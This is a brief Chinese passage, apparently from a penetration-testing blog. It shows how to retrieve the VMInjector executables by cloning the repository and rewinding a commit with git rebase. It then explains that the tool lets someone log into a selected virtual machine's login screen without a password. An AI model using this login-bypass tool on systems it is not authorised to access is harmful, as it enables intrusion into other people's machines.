所以,需要回滚到github上一个版本来获取exe执行文件。

git clone https://github.com/batistam/VMInjector
cd VMInjector
git rebase -i HEAD~2 (在编辑界面删除第2行文字!!!)

目的是撤销最近的一次提交.这样被删掉的exe文件就回来了.

root@bt:~/VMInjector# ls
LICENSE  README  vminjector  vminjector-src
root@bt:~/VMInjector# git rebase -i HEAD~2
Successfully rebased and updated refs/heads/master.
root@bt:~/VMInjector# 
root@bt:~/VMInjector# 
root@bt:~/VMInjector# ls
LICENSE  vminjector            vminjector64-exe.rar
README   vminjector32-exe.rar  vminjector-src

使用方法命令行下执行,选择需要解锁的虚拟机然后选择操作系统版本.然后再虚拟机登录界面直接回车,不需要密码就可以登录了。